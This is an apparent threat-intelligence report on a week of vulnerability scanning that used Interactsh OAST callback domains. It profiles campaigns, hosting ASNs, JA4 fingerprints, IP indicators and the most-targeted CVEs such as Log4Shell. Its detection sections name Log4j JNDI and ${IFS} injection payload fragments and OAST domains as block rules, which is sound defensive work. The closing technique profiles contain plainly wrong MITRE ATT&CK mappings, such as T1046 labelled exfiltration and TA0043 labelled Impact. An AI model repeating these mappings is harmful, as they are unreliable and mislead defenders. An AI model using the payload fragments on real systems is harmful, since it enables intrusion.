Full Report
Overview During the week of January 31 - February 7, 2026, GreyNoise sensors observed 3,979 HTTP sessions from 245 unique IP addresses containing callbacks to Interactsh OAST (Out-of-band Application Security Testing) domains. The activity generated 3,707 unique OAST domains spanning 82 distinct campaign identifiers, indicating numerous independent scanning operations rather than coordinated infrastructure. Analysis employed JA4T+JA4H fingerprint clustering, OAST domain decoding, and GreyNoise IP enrichment to characterize the scanning landscape. Key findings include: Hosting Infrastructure Dominance: Top ASNs include RouterHosting LLC (AS14956, 1,084 sessions), Cloudflare (AS13335, 651 sessions), and netcup GmbH (AS214996, 545 sessions) Scanner Identification: MSS value analysis reveals 1,341 sessions (33.7%) exhibit the anomalous MSS 65495 fingerprint characteristic of Nuclei scanner deployment CVE Targeting: 196 distinct vulnerability tags observed, with Apache Log4j RCE (CVE-2021-44228) accounting for 1,090 attempts (27.4% of total activity) Malicious Classification: GreyNoise classifies 19 of 20 top source IPs as “noise,” with established reconnaissance infrastructure dating back to November 2025 The distributed nature of campaigns, absence of IP overlap between major campaigns, and heterogeneous fingerprint patterns indicate independent security testing operations rather than coordinated threat actor infrastructure. Temporal Analysis Activity exhibited consistent volume across the analysis period with notable variations: Date Sessions Unique IPs Unique Campaigns Pattern Jan 31 699 6 11 Initial baseline Feb 1 642 10 18 Sustained activity Feb 2 236 7 13 Weekend reduction Feb 3 149 11 15 Low point Feb 4 631 12 20 Mid-week surge Feb 5 386 12 17 Sustained Feb 6 573 214 20 Anomalous multi-IP event Feb 7 663 12 6 Return to baseline Temporal Anomaly - February 6: A single day spike to 214 unique IPs (vs. baseline 6-12) occurred on February 6, driven by campaign 01p6c which recorded 204 unique IPs targeting a single OAST domain. This pattern suggests either: 1. A shared/reused OAST domain from prior scanning that triggered callbacks from cached payloads 2. Mass exploitation attempt using a common callback infrastructure Hourly analysis reveals burst patterns concentrated in specific time windows: - Jan 31, 15:00 UTC: 273 sessions (single campaign burst) - Jan 31, 22:00 UTC: 135 sessions (campaign concentration) - Feb 1, 15:00 UTC: 112 sessions (sustained scanning window) No consistent diurnal pattern emerged, suggesting globally distributed scanning infrastructure operating across multiple timezones. Campaign Analysis The 82 identified campaigns exhibit high heterogeneity, with most representing single-IP operations. Top campaigns by volume: Campaign: lftn9 (ksort: d5v0a0) Sessions: 652 Source IPs: 1 (172.86.66.237) ASN: AS14956 (RouterHosting LLC) Active Period: Jan 31 - Feb 1 Machine ID: af:ed:d2 PID: 43608 Fingerprint: JA4T 64240_2-4-8-1-3_1460_7 (standard MSS) GreyNoise Profile: Malicious classification, 7.4M sensor hits across 4 sensors, first seen Jan 19, 2026. Full-spectrum scanner with 300+ tags including Log4j, Confluence, pfSense, and numerous CVE-specific tags. Targets 169 ports. Campaign: ibe4q (ksort: d638bj) Sessions: 603 Source IPs: 9 (Cloudflare-hosted) ASN: AS13335 (Cloudflare, Inc.) Active Period: Feb 7 (single day burst) Machine ID: 4b:71:35 PID: 50516 Fingerprint: JA4T 65535_2-4-8-1-3_1380_13 (MSS 1380 - Cloudflare characteristic) Pattern: Multiple IPs from same ASN suggest Cloudflare-hosted scanning infrastructure Campaign: 7bm4o (ksort: d627ng, d61gfu, d62tr4) Sessions: 545 total (245 + 210 + 90 across three runs) Source IPs: 1 (152.53.55.52) ASN: AS214996 (netcup GmbH) Active Period: Feb 4-6 (repeated execution) Machine ID: eb:b1:31 PIDs: 13592, 19613, 56288 (different process per run) Fingerprint: JA4T 65495_2-4-8-1-3_65495_7 (Nuclei scanner MSS signature) GreyNoise Profile: Malicious classification, 16.8K sensor hits across 194 sensors, first seen Feb 3, 2026. Focused targeting: Log4j, React Server Components deserialization (CVE-2025-55182). Campaign: j6o66 (ksort: d61fft) Sessions: 231 Source IPs: 1 (38.55.192.204) ASN: AS139659 (LUCIDACLOUD LIMITED) Active Period: Feb 4-5 Fingerprint: JA4T 64240_2-4-8-1-3_1460_7 (standard MSS) GreyNoise Profile: NOT classified (no GreyNoise intelligence available) Campaign: 01p6c (ksort: cspn4b) - Anomaly Sessions: 204 Source IPs: 204 (one-to-one mapping) ASNs: 5 distinct (AS20473, AS207990, AS202412, AS215439, AS8075) Active Period: Feb 6 (single day) Machine ID: 01:c9:98 PID: 50061 Pattern: Single OAST domain triggered callbacks from 204 distinct IPs. Likely represents cached payloads from earlier scanning activity or mass exploitation with shared callback infrastructure. Infrastructure Fingerprinting JA4 Fingerprint Analysis Three dominant MSS patterns emerged, revealing scanner tooling: MSS Category Sessions IPs Interpretation MSS 1460 1,527 (38.4%) 18 Standard TCP MSS (Linux default) MSS 65495 1,341 (33.7%) 20 Nuclei scanner signature MSS 1380 651 (16.4%) 9 Cloudflare WARP VPN characteristic Other 460 (11.6%) 209 Heterogeneous/unclassified MSS 65495 Anomaly: The use of MSS 65495 is a well-documented fingerprint of the Nuclei vulnerability scanner. This non-standard value appears in JA4T fingerprints as 65495_2-4-8-1-3_65495_7, indicating explicit configuration of TCP Maximum Segment Size to this unusual value. 20 distinct IPs exhibited this fingerprint, spanning ASNs including AS214996 (netcup), AS14956 (RouterHosting), AS210083 (Privex), and AS14061 (DigitalOcean). Cloudflare MSS 1380: All 651 sessions with MSS 1380 originated from AS13335 (Cloudflare), consistent with Cloudflare’s WARP VPN service TCP characteristics. GreyNoise confirms VPN classification for 104.28.193.87 (WARP_VPN service). ASN Distribution Top autonomous systems by session volume: ASN Organization Sessions IPs Campaigns Category AS14956 RouterHosting LLC 1,084 2 6 Hosting AS13335 Cloudflare, Inc. 651 9 2 CDN/Hosting AS214996 netcup GmbH 545 1 2 Hosting AS14061 DigitalOcean, LLC 269 4 7 Cloud hosting AS139659 LUCIDACLOUD LIMITED 256 1 2 Hosting AS51852 Private Layer INC 210 1 3 Privacy hosting AS20473 The Constant Company 185 178 3 Hosting (Vultr) AS210083 Privex Inc. 158 1 9 Privacy hosting The dominance of hosting providers and cloud infrastructure reflects the typical scanning landscape with actors operating from rented VPS infrastructure. Payload Analysis GreyNoise tag analysis reveals broad-spectrum vulnerability reconnaissance targeting 196 distinct vulnerability classes: Top CVE Targets CVE / Payload Type Sessions Unique IPs Description Apache Log4j RCE (CVE-2021-44228) 1,090 94 Log4Shell JNDI injection Fastjson RCE 319 12 Java deserialization Generic XSS 186 19 Cross-site scripting probes CGI Script Scanner 184 16 Legacy CGI vulnerabilities Generic ${IFS} RCE 142 9 Bash command injection pfSense pfBlockerNG (CVE-2023-47246) 136 7 Command injection Draytek Vigor (CVE-2024-12987) 126 4 Router command injection GPON Router (CVE-2018-10561) 112 15 Router worm attempts Path Traversal 92 15 Directory traversal Seagate BlackArmor 62 14 NAS RCE attempts Payload Characteristics Deserialization Targets: Fastjson, XStream, Apache OFBiz, Oracle WebLogic - focus on Java deserialization chains IoT/Edge Devices: GPON routers, Draytek, pfSense, Zyxel, Totolink - embedded device targeting Enterprise Software: Atlassian Confluence (CVE-2022-26134), VMware vCenter, FortiOS, Citrix CMS/Web Apps: WordPress plugins (multiple SQLi/RCE vulnerabilities), Joomla, Drupal No evidence of active exploitation or malware delivery infrastructure. Activity patterns consistent with vulnerability research, CVE validation, and attack surface mapping. GreyNoise Enrichment Analysis GreyNoise multi-IP check on top 20 source IPs revealed: - 19/20 classified as “noise” (active Internet scanners) - 0/20 identified as common business services (not CDN/legitimate traffic) - 1/20 no classification (38.55.192.204 - potentially new infrastructure) Notable GreyNoise Profiles 172.86.66.237 (RouterHosting LLC) Classification: MALICIOUS First Seen: Jan 19, 2026 (pre-dates analysis window) Sensor Hits: 7,418,938 across 4 sensors Tags: 300+ vulnerability-specific tags (full-spectrum scanner) Scanned Ports: 169 ports (comprehensive port scanning) Bot: No | Tor: No | VPN: No Assessment: Established reconnaissance infrastructure, long-term persistent scanning 152.53.55.52 (netcup GmbH) Classification: MALICIOUS First Seen: Feb 3, 2026 (recent activation) Sensor Hits: 16,848 across 194 sensors (broad targeting) Tags: Log4j, React Server Components CVE-2025-55182, OAST domains Scanned Ports: 10 (web-focused: 80, 443, 3000, 8080, 9000, etc.) Bot: No | Tor: No | VPN: No Assessment: Focused web vulnerability scanner, recent deployment 104.28.193.87 (Cloudflare) Classification: MALICIOUS First Seen: Nov 9, 2025 (long-term infrastructure) Sensor Hits: 81,099 across 17 sensors Tags: 400+ tags (full-spectrum scanner) Scanned Ports: 5 (web-only: 80, 443, 7001, 8080, 8443) Bot: No | Tor: No | VPN: Yes (WARP_VPN) Assessment: Cloudflare-hosted scanning via WARP VPN, established infrastructure Attribution Assessment Confidence: Low The distributed, heterogeneous nature of observed activity precludes meaningful threat actor attribution. Evidence suggests: Evidence Supporting Independent Operations: Campaign Isolation: 82 distinct campaigns with minimal IP overlap (exception: Feb 6 anomaly) Diverse Infrastructure: 245 IPs across 45+ ASNs spanning 30+ countries Heterogeneous Tooling: Mix of Nuclei (MSS 65495), custom tooling (standard MSS), Cloudflare-hosted infrastructure Varied Targeting: While Log4j dominates, 196 distinct vulnerability classes indicate non-coordinated reconnaissance priorities Temporal Distribution: No coordinated timing patterns; activity distributed across timezones Infrastructure Categories: Bug Bounty Hunters: Single-IP campaigns with focused targeting patterns Penetration Testing Tools: Nuclei scanner deployment (20 IPs) No indicators of coordinated threat actor activity, nation-state operations, or organized criminal infrastructure. Network IOCs Primary Source IPs IP Address ASN Organization Sessions Campaigns GreyNoise 172.86.66.237 AS14956 RouterHosting LLC 867 4 MALICIOUS 152.53.55.52 AS214996 netcup GmbH 545 2 MALICIOUS 104.28.193.87 AS13335 Cloudflare 389 2 MALICIOUS (VPN) 38.55.192.204 AS139659 LUCIDACLOUD 256 2 None 107.189.16.186 AS14956 RouterHosting LLC 217 2 MALICIOUS 179.43.146.42 AS51852 Private Layer INC 210 3 MALICIOUS 185.130.47.197 AS210083 Privex Inc. 158 9 MALICIOUS 209.38.59.247 AS14061 DigitalOcean 126 2 MALICIOUS 94.156.102.143 AS215439 PLAY2GO INTL 104 2 MALICIOUS 20.64.169.232 AS8075 Microsoft Corp 94 5 MALICIOUS OAST Domain Pattern All observed domains follow Interactsh format: [subdomain].oast.pro Example campaign domains: - Campaign lftn9: d5v0a0lftn9*.oast.pro (652 unique domains) - Campaign ibe4q: d638bjibe4q*.oast.pro (603 unique domains) - Campaign 7bm4o: d627ng7bm4o*.oast.pro, d61gfu7bm4o*.oast.pro, d62tr4fbm4o*.oast.pro (545 total) Decoding Pattern: - ksort value (e.g., d5v0a0) represents timestamp + sequential identifier - campaign value (e.g., lftn9) derived from machine ID, PID, and counter - Each session generates unique subdomain for callback correlation JA4 Fingerprints for Detection Nuclei Scanner (MSS 65495): JA4T: 65495_2-4-8-1-3_65495_7 JA4H: ge11nr17${jn_8062e975b6e7_* Standard MSS (RouterHosting infrastructure): JA4T: 64240_2-4-8-1-3_1460_7 JA4H: ge11nn020000_1af9d02f0bf7_* JA4H: po11nn060000_4ea4093e6290_* JA4H: ge10nn010000_4a823118b9ba_* Cloudflare WARP VPN: JA4T: 65535_2-4-8-1-3_1380_13 JA4H: po11nn08en00_9cf61e78b7a7_* Detection Recommendations Monitor for Interactsh OAST callbacks in outbound DNS and HTTP traffic. Alert on requests to *.oast.pro, *.interact.sh, and *.burpcollaborator.net domains originating from internal production systems (exception: authorized security testing). JA4 fingerprint detection for Nuclei scanner identification: Alert on JA4T fingerprint 65495_2-4-8-1-3_65495_7 Correlate with OAST callbacks for high-confidence reconnaissance detection Prioritize patching for top targeted CVEs: CVE-2021-44228 (Log4Shell) - 1,090 attempts observed CVE-2023-47246 (pfSense pfBlockerNG) - 136 attempts CVE-2024-12987 (Draytek Vigor) - 126 attempts CVE-2022-26134 (Atlassian Confluence) - 57 attempts ASN-based rate limiting for hosting providers exhibiting malicious classification: AS14956 (RouterHosting LLC) AS214996 (netcup GmbH) AS210083 (Privex Inc.) Consider geo-blocking or aggressive rate limiting for non-business-critical origins WAF rules for OAST injection patterns: Block requests containing ${jndi:ldap:// (Log4j) Block requests with .oast.pro, .interact.sh in headers, body, or query parameters Alert on ${IFS} command injection attempts February 6 anomaly investigation: Organizations with traffic to/from the 204 IPs in campaign 01p6c should investigate for cached exploitation attempts. The spike suggests prior vulnerability with delayed OAST callbacks. GNQL Queries Monitor recent OAST callback activity: tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d Track Nuclei scanner deployment (MSS 65495): metadata.ja4.tcp:"65495_2-4-8-1-3_65495_7" last_seen:7d Investigate top malicious ASNs: metadata.asn:AS14956 last_seen:7d metadata.asn:AS214996 last_seen:7d metadata.asn:AS13335 tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d Log4j targeting IPs: tags:"Apache Log4j RCE Attempt" tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d Cloudflare-hosted scanners: metadata.asn:AS13335 classification:malicious last_seen:7d New/emerging scanning infrastructure (Feb 3+ first seen): tags:"Generic Contains Well-known Out-of-band Interaction Domain" first_seen:>2026-02-03
Analysis Summary
# Tool/Technique: Nuclei Scanner
## Overview
Nuclei is an open-source, high-performance scanner built to enumerate assets and detect vulnerabilities based on community-contributed templates. It is identified in this context by its anomalous TCP Maximum Segment Size (MSS) value used during scanning, which leaves a distinct network fingerprint.
## Technical Details
- Type: Attack Tool (Vulnerability Scanner)
- Platform: General (Network/Web Scanners)
- Capabilities: Vulnerability scanning, exploitability verification, reconnaissance, OAST integration.
- First Seen: Referenced infrastructure observed as early as January 19, 2026 (GreyNoise profile for Scanner 172.86.66.237). Specifically observed in Campaign 7bm4o starting February 3, 2026.
## MITRE ATT&CK Mapping
- TA0043 - Impact (N/A - Reconnaissance Phase)
- T1595 - Active Scanning
- T1595.002 - Internet Service Scanning
## Functionality
### Core Capabilities
* Leverages a large set of declarative YAML templates to identify vulnerabilities rapidly.
* Integral to the observed activity through the use of Out-of-Band Application Security Testing (OAST) domains (Interactsh) to confirm command or code execution vulnerabilities.
### Advanced Features
* Distinct network fingerprint characterized by MSS value 65495 in the TCP handshake, enabling specific network-level identification.
* Targets a wide array of vulnerabilities, including high-profile CVEs like Log4j (CVE-2021-44228) and newer deserialization flaws (CVE-2025-55182).
## Indicators of Compromise
- File Hashes: N/A (Relates to network traffic/fingerprinting, not a dropped payload)
- File Names: N/A
- Registry Keys: N/A
- Network Indicators:
- **JA4T Fingerprint:** `65495_2-4-8-1-3_65495_7` (Indicator of customized MSS)
- Associated IPs leveraging this fingerprint include: 152.53.55.52 (AS214996/netcup GmbH).
- Behavioral Indicators: OAST callbacks to Interactsh domains during probing attempts.
## Associated Threat Actors
The scanner itself is a common tool used by security researchers, bug bounty hunters, and penetration testers. The analysis suggests these activities are characteristic of independent security testing rather than a specific coordinated threat actor group.
## Detection Methods
- **Signature-based detection:** Alert on the specific JA4T fingerprint `65495_2-4-8-1-3_65495_7`.
- **Behavioral detection:** Alert on outbound DNS or HTTP requests to OAST domains (`*.oast.pro`, `*.interact.sh`) originating from internal assets being probed.
- **Pattern Matching:** Alert on WAF/Proxy indicators containing `${IFS}` command injection strings.
## Mitigation Strategies
- **Patching:** Prioritize remediation for highly targeted vulnerabilities such as CVE-2021-44228 (Log4j).
- **Network Monitoring:** Implement network egress filtering or deep packet inspection to rapidly identify and block OAST callback attempts.
- **WAF Hardening:** Deploy rules to block common OAST injection payloads (e.g., `${jndi:ldap://`).
## Related Tools/Techniques
- ProjectDiscovery Interactsh (The OAST service used for callback verification).
- Other general scanners identified via standard MSS (1460) or Cloudflare WARP (MSS 1380) fingerprints.
---
# Tool/Technique: Interactsh OAST Callback Mechanism
## Overview
Interactsh is an Open-Source Out-of-Band Application Security Testing (OAST) platform utilized by scanners to confirm vulnerabilities that rely on external interaction (e.g., blind SSRF, RCE via JNDI lookup). Interaction with observer domains signals successful payload delivery.
## Technical Details
- Type: Technique (Reconnaissance/Verification Method)
- Platform: Network/Web Applications (Generates outbound DNS/HTTP requests)
- Capabilities: Verifies remote code execution, blind injection, or deserialization flaws by monitoring DNS lookups or HTTP requests destined for specific OAST domains.
- First Seen: Activity covered Jan 31 - Feb 7, 2026.
## MITRE ATT&CK Mapping
- TA0007 - Discovery
- T1598 - DNS of Target Systems
- T1598.003 - Domain Requests (Implicitly, when using OAST confirmation)
- TA0011 - Command and Control (Indirectly, as a communication channel during testing)
- T1032 - External Control Channel Techniques (Verification phase)
## Functionality
### Core Capabilities
* The technique relies on the scanner embedding a unique, single-use OAST domain (e.g., `[subdomain].oast.pro`) into a payload.
* Successful connection or successful resolution of this unique domain back to the Interactsh infrastructure confirms the vulnerability's existence.
### Advanced Features
* **Campaign Isolation:** Each session generates a unique domain, allowing threat actors/testers to map specific callbacks back to the originating scan attempt via machine ID/PID correlation in the domain structure.
* **Temporal Anomaly:** The campaign `01p6c` demonstrated an anomaly where 204 distinct IPs triggered callbacks to a single domain, potentially indicating cached responses or a mass exploitation event utilizing shared callback infrastructure.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators:
- Target Domains: All domains ending in `*.oast.pro` (or similar, such as `*.interact.sh`, `*.burpcollaborator.net`).
- Example correlated callback patterns: `d5v0a0lftn9*.oast.pro`.
- Behavioral Indicators: Outbound traffic (HTTP GET/HEAD, DNS A/AAAA/PTR/NS queries) directed towards these unique domains from internal or perimeter assets.
## Associated Threat Actors
Vulnerability researchers, penetration testers, and potentially automated attack tools leveraging this verification methodology. No specific threat actor attributed.
## Detection Methods
- **Egress Monitoring:** Hard requirement to monitor DNS and HTTP traffic for known OAST domain patterns.
- **WAF/Proxy Rules:** Immediate blocking of requests containing known OAST domains in URL/headers/body.
- **Correlation:** Tying observed OAST callbacks to internal asset activity immediately before the callback confirms a reconnaissance attempt.
## Mitigation Strategies
- **Outbound Policy:** Implement stringent egress policy restricting connections to external, unapproved domains, especially those commonly associated with security tooling.
- **Payload Sanitization:** Ensure web application input fields are strictly sanitized to prevent injection of OAST syntax or domain names.
## Related Tools/Techniques
- Blind SSRF/RCE Exploitation Frameworks.
- Burp Collaborator (a commercial alternative OAST tool).
---
# Technique: Anomalous TCP Maximum Segment Size (MSS 65495) Probing
## Overview
This refers to the technique of manipulating the TCP MSS option in the SYN packet to a non-standard value, specifically 65495, used predominantly by the Nuclei scanner to fingerprint its traffic. This is a configuration choice within the tool rather than an inherent vulnerability.
## Technical Details
- Type: Technique (Tool Configuration/Fingerprinting)
- Platform: TCP/IP Layer
- Capabilities: Used for host fingerprinting; signifies the use of the Nuclei scanner against network services.
- First Seen: 1,341 sessions exhibiting this fingerprint were observed, distributed across 20 unique IPs during the reporting period.
## MITRE ATT&CK Mapping
- TA0016 - Collection (Implicitly to gather data on what systems respond)
- T1046 - Exfiltration Over C2 Channel (The associated reconnaissance is the precursor to this)
## Functionality
### Core Capabilities
* The value 65495 is explicitly set in the TCP option field by the scanner, resulting in the JA4T fingerprint component `65495_2-4-8-1-3_65495_7`.
* This technique reveals the use of high-automation, template-driven scanning activity.
### Advanced Features
* High correlation with OAST callback successful verification, confirming that these probes are specifically targeted at confirming known vulnerabilities.
## Indicators of Compromise
- Network Indicators:
- **JA4T Fingerprint:** `65495_2-4-8-1-3_65495_7`
## Associated Threat Actors
Users of the Nuclei scanner, identified contextually as independent security testers due to the diversified targeting and non-coordinated IP infrastructure.
## Detection Methods
- **JA4/JA4H Detection:** Primary detection relies on identifying the unique MSS configuration via JA4 analysis platforms.
- **Correlation:** Alert when the MSS 65495 fingerprint occurs in conjunction with an external connection attempt (e.g., OAST callback).
## Mitigation Strategies
- **Network Visibility:** Ensure full packet capture or deep flow analysis capable of inspecting Layer 4 TCP options (like MSS) is deployed.
## Related Tools/Techniques
- Nuclei Scanner (the tool utilizing this configuration).
- Other MSS manipulation techniques used by different scanning tools.